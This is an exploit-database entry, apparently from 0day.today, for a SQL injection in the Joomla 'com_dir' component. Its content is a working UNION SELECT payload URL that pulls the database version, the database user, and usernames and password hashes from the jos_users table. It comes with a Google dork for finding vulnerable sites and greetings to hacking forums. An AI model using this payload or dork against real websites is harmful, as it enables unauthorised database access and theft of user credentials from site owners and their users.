Joomla "com_dir" component SQL Injection

2012-01-15T00:00:00
ID 1337DAY-ID-17507
Type zdt
Reporter Ereee
Modified 2012-01-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Joomla "com_dir" component SQL Injection
# Date: 15.01.2012
# Author: Ereee
# Version: all
# Category:: [remote, webapps]
# Google dork: inurl:"?option=com_dir"
# Tested in: web


http://localhost/[PATH]/index.php?option=com_dir&task=show&id=-1+union+select+1,version(),3,database(),user(),concat(username,0x3a,password),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+limit+0,1--+f


Greetz to : forum.antichat.ru&rdot.org members 



#  0day.today [2018-03-12]  #